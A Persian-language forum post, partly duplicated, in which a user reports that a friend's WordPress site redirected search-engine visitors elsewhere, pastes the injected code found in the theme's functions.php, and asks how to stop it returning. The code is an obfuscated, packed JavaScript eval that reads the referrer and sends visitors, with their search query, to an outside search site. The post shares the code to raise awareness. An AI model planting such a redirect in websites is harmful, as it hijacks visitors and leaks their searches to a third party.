با سلام
چند روز پیش سایت یکی از دوستان دچار یک مشکلی شده بود . وقتی از گوگل میخواستی وارد سایتش بشی ریدایرکت میشد به یه سایتی که موتور جستجو بود ...
من کد های قالبشو بررسی کردم دیدم تو فایل functions.php یه کد مخرب هست .
البته این کد رو کسی تو سایتش نذاشته بود . من احتمال میدم بخاطر نصب یک پلاگین مشکلدار بوده .
نکته جالب : وقتی این کد رو پاک میکردم 2 3 روز بعد دوباره برمیگشت . اینش واسم عجیب بود
تو انجمن های خارجی هم گشتم گفته بودن دسترسی فایل functions.php قالب رو همیشه رو 400 بزارید . من این کارو کردم فعلا که جواب داده .
هدف تاپیک اطلاع رسانی بود :wacko:
این کد از کجا اومده به نظر شما ؟ بهترین راه حل واسه جلوگیری از بازگشتش چیه ؟
چند روز پیش سایت یکی از دوستان دچار یک مشکلی شده بود . وقتی از گوگل میخواستی وارد سایتش بشی ریدایرکت میشد به یه سایتی که موتور جستجو بود ...
من کد های قالبشو بررسی کردم دیدم تو فایل functions.php یه کد مخرب هست .
البته این کد رو کسی تو سایتش نذاشته بود . من احتمال میدم بخاطر نصب یک پلاگین مشکلدار بوده .
نکته جالب : وقتی این کد رو پاک میکردم 2 3 روز بعد دوباره برمیگشت . اینش واسم عجیب بود
کد:
<!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>
تو انجمن های خارجی هم گشتم گفته بودن دسترسی فایل functions.php قالب رو همیشه رو 400 بزارید . من این کارو کردم فعلا که جواب داده .
هدف تاپیک اطلاع رسانی بود :wacko:
این کد از کجا اومده به نظر شما ؟ بهترین راه حل واسه جلوگیری از بازگشتش چیه ؟